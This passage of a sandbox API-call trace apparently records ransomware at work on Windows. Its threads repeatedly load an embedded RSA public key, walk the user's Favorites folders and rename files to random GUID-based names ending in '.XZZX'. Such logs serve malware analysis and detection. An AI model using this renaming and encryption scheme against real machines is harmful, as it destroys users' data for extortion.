lpString1="FD9030E848C62D90344A51E94CDE11D8.XZZX") returned="FD9030E848C62D90344A51E94CDE11D8.XZZX" [0181.279] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0181.279] SetErrorMode (uMode=0x1) returned 0x1 [0181.279] lstrcpyW (in: lpString1=0x2aaf860, lpString2="FD9030E848C62D90344A51E94CDE11D8.XZZX" | out: lpString1="FD9030E848C62D90344A51E94CDE11D8.XZZX") returned="FD9030E848C62D90344A51E94CDE11D8.XZZX" [0181.279] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xaf62d0fd, Data2=0x15c8, Data3=0x43d4, Data4=([0]=0xb0, [1]=0xee, [2]=0xc7, [3]=0xf3, [4]=0xa9, [5]=0xd3, [6]=0x29, [7]=0xb9))) returned 0x0 [0181.279] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\FD9030E848C62D90344A51E94CDE11D8.XZZX") returned 100 [0181.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0181.279] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\205806A805C561A0AF62D0FD087045E8.XZZX") returned 100 [0181.279] StrStrW (lpFirst="FD9030E848C62D90344A51E94CDE11D8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 654 os_tid = 0xc38 [0181.440] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0181.440] lstrcpyW (in: lpString1=0x2aaf460, lpString2="13771DB6235C0ADD78BD03922773EF25.XZZX" | out: lpString1="13771DB6235C0ADD78BD03922773EF25.XZZX") returned="13771DB6235C0ADD78BD03922773EF25.XZZX" [0181.440] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0181.440] SetErrorMode (uMode=0x1) returned 0x1 [0181.440] lstrcpyW (in: lpString1=0x2aaf860, lpString2="13771DB6235C0ADD78BD03922773EF25.XZZX" | out: lpString1="13771DB6235C0ADD78BD03922773EF25.XZZX") returned="13771DB6235C0ADD78BD03922773EF25.XZZX" [0181.440] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xacb09c51, Data2=0x63c, Data3=0x4c97, Data4=([0]=0x9c, [1]=0x65, [2]=0xf2, [3]=0x19, [4]=0xf9, [5]=0x31, [6]=0x92, [7]=0x3d))) returned 0x0 [0181.440] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\13771DB6235C0ADD78BD03922773EF25.XZZX") returned 94 [0181.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0181.440] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\9D0E88FC01DD7D64ACB09C51048861AC.XZZX") returned 94 [0181.440] StrStrW (lpFirst="13771DB6235C0ADD78BD03922773EF25.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 655 os_tid = 0xc40 [0181.590] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0181.590] lstrcpyW (in: lpString1=0x2aaf460, lpString2="583CA788134302604AF8FA2E175AE6A8.XZZX" | out: lpString1="583CA788134302604AF8FA2E175AE6A8.XZZX") returned="583CA788134302604AF8FA2E175AE6A8.XZZX" [0181.590] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0181.590] SetErrorMode (uMode=0x1) returned 0x1 [0181.591] lstrcpyW (in: lpString1=0x2aaf860, lpString2="583CA788134302604AF8FA2E175AE6A8.XZZX" | out: lpString1="583CA788134302604AF8FA2E175AE6A8.XZZX") returned="583CA788134302604AF8FA2E175AE6A8.XZZX" [0181.591] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xd5feee27, Data2=0xc9, Data3=0x4b3b, Data4=([0]=0xa3, [1]=0x5a, [2]=0x1c, [3]=0xf5, [4]=0x61, [5]=0x88, [6]=0x25, [7]=0x8d))) returned 0x0 [0181.591] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\583CA788134302604AF8FA2E175AE6A8.XZZX") returned 94 [0181.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0181.591] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\0528FC9F003B1153D5FEEE2702E5F59B.XZZX") returned 94 [0181.591] StrStrW (lpFirst="583CA788134302604AF8FA2E175AE6A8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 656 os_tid = 0xc44 [0181.746] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0181.746] lstrcpyW (in: lpString1=0x2aaf460, lpString2="833DF956476C97EAEAF8AD0B4B847C32.XZZX" | out: lpString1="833DF956476C97EAEAF8AD0B4B847C32.XZZX") returned="833DF956476C97EAEAF8AD0B4B847C32.XZZX" [0181.746] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0181.746] SetErrorMode (uMode=0x1) returned 0x1 [0181.746] lstrcpyW (in: lpString1=0x2aaf860, lpString2="833DF956476C97EAEAF8AD0B4B847C32.XZZX" | out: lpString1="833DF956476C97EAEAF8AD0B4B847C32.XZZX") returned="833DF956476C97EAEAF8AD0B4B847C32.XZZX" [0181.746] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xa7b07049, Data2=0x7e02, Data3=0x465c, Data4=([0]=0x87, [1]=0xb1, [2]=0x23, [3]=0x15, [4]=0x13, [5]=0x2e, [6]=0x23, [7]=0xc2))) returned 0x0 [0181.746] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\833DF956476C97EAEAF8AD0B4B847C32.XZZX") returned 94 [0181.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0181.747] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\26A4CE9222A1D4B8A7B07049254CB900.XZZX") returned 94 [0181.747] StrStrW (lpFirst="833DF956476C97EAEAF8AD0B4B847C32.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 657 os_tid = 0xc48 [0181.903] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0181.903] lstrcpyW (in: lpString1=0x2aaf460, lpString2="880F5E93248AC126C0E08BB728B7A56E.XZZX" | out: lpString1="880F5E93248AC126C0E08BB728B7A56E.XZZX") returned="880F5E93248AC126C0E08BB728B7A56E.XZZX" [0181.903] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0181.903] SetErrorMode (uMode=0x1) returned 0x1 [0181.903] lstrcpyW (in: lpString1=0x2aaf860, lpString2="880F5E93248AC126C0E08BB728B7A56E.XZZX" | out: lpString1="880F5E93248AC126C0E08BB728B7A56E.XZZX") returned="880F5E93248AC126C0E08BB728B7A56E.XZZX" [0181.903] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x18773c95, Data2=0x2ad4, Data3=0x4839, Data4=([0]=0xaf, [1]=0x42, [2]=0xa8, [3]=0x32, [4]=0xe4, [5]=0xfd, [6]=0x7f, [7]=0x20))) returned 0x0 [0181.903] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\880F5E93248AC126C0E08BB728B7A56E.XZZX") returned 94 [0181.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0181.904] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\D2AE9D640C15293418773C950EC00D7C.XZZX") returned 94 [0181.904] StrStrW (lpFirst="880F5E93248AC126C0E08BB728B7A56E.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 658 os_tid = 0xc4c [0182.059] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0182.059] lstrcpyW (in: lpString1=0x2aaf460, lpString2="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX" | out: lpString1="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX") returned="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX" [0182.059] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0182.059] SetErrorMode (uMode=0x1) returned 0x1 [0182.059] lstrcpyW (in: lpString1=0x2aaf860, lpString2="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX" | out: lpString1="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX") returned="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX" [0182.059] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x3e971b80, Data2=0xafe6, Data3=0x4b1d, Data4=([0]=0xa1, [1]=0xb5, [2]=0x63, [3]=0x22, [4]=0xf7, [5]=0x73, [6]=0xcf, [7]=0xea))) returned 0x0 [0182.059] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\8F3B67D5108CB69FDD5C15D914B99AE7.XZZX") returned 94 [0182.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0182.059] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\878F3500339C4F0E3E971B8036473356.XZZX") returned 94 [0182.059] StrStrW (lpFirst="8F3B67D5108CB69FDD5C15D914B99AE7.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 659 os_tid = 0xc50 [0182.215] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0182.215] lstrcpyW (in: lpString1=0x2aaf460, lpString2="94764F5B3C2DC73EAED48D494045AB86.XZZX" | out: lpString1="94764F5B3C2DC73EAED48D494045AB86.XZZX") returned="94764F5B3C2DC73EAED48D494045AB86.XZZX" [0182.215] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0182.215] SetErrorMode (uMode=0x1) returned 0x1 [0182.215] lstrcpyW (in: lpString1=0x2aaf860, lpString2="94764F5B3C2DC73EAED48D494045AB86.XZZX" | out: lpString1="94764F5B3C2DC73EAED48D494045AB86.XZZX") returned="94764F5B3C2DC73EAED48D494045AB86.XZZX" [0182.215] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xb35725f9, Data2=0xb53c, Data3=0x4f8e, Data4=([0]=0xbc, [1]=0xc2, [2]=0x81, [3]=0xfb, [4]=0x63, [5]=0xc6, [6]=0x8b, [7]=0xde))) returned 0x0 [0182.215] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\94764F5B3C2DC73EAED48D494045AB86.XZZX") returned 94 [0182.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0182.215] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\A645F35C38520B48B35725F93AFCEF90.XZZX") returned 94 [0182.215] StrStrW (lpFirst="94764F5B3C2DC73EAED48D494045AB86.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 660 os_tid = 0xc54 [0182.375] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0182.375] lstrcpyW (in: lpString1=0x2aaf460, lpString2="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX" | out: lpString1="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX") returned="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX" [0182.375] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0182.375] SetErrorMode (uMode=0x1) returned 0x1 [0182.375] lstrcpyW (in: lpString1=0x2aaf860, lpString2="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX" | out: lpString1="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX") returned="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX" [0182.375] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x3d67e304, Data2=0xc635, Data3=0x4ac4, Data4=([0]=0xb3, [1]=0x9c, [2]=0x72, [3]=0xd, [4]=0x4b, [5]=0xf2, [6]=0x52, [7]=0x15))) returned 0x0 [0182.375] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX") returned 94 [0182.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0182.375] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\101717D439E312943D67E3043C8DF6DC.XZZX") returned 94 [0182.375] StrStrW (lpFirst="9AA1DB0A3E2DB1949E51C4AE424595DC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 661 os_tid = 0xc58 [0182.526] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0182.526] lstrcpyW (in: lpString1=0x2aaf460, lpString2="A58916D017654CD0CF379F2B1B923118.XZZX" | out: lpString1="A58916D017654CD0CF379F2B1B923118.XZZX") returned="A58916D017654CD0CF379F2B1B923118.XZZX" [0182.526] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS 